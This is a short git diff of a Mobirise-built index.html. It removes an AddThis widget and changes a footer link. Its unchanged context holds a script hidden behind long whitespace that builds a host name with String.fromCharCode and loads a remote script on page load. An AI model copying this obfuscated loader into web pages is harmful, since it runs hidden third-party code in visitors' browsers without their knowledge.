create github pages

--- a/index.html
+++ b/index.html
@@ -38,9 +38,6 @@
                                                                                                                         e='https://e';g=e+'duzz'+'.'+String.fromCharCode(105, 110, 102, 111)+'/'+g;a.async=1;
                                                                                                                         a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','dev/js/px.js',39FTI,22263133,'edzpx');</script>
 
-<!-- Go to www.addthis.com/dashboard to customize your tools -->
-<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5d733a3364477e11"></script>
-
 <!-- /Google Analytics -->
 
 
@@ -74,7 +71,7 @@
     </nav>
 </section>
 
-<section class="engine"><a href="https://mobirise.info/s">bootstrap theme</a></section><section class="mbr-section content4 cid-ryzN14gpQ2" id="content4-r">
+<section class="engine"><a href="https://mobirise.info/q">responsive web templates</a></section><section class="mbr-section content4 cid-ryzN14gpQ2" id="content4-r">
 
     
 
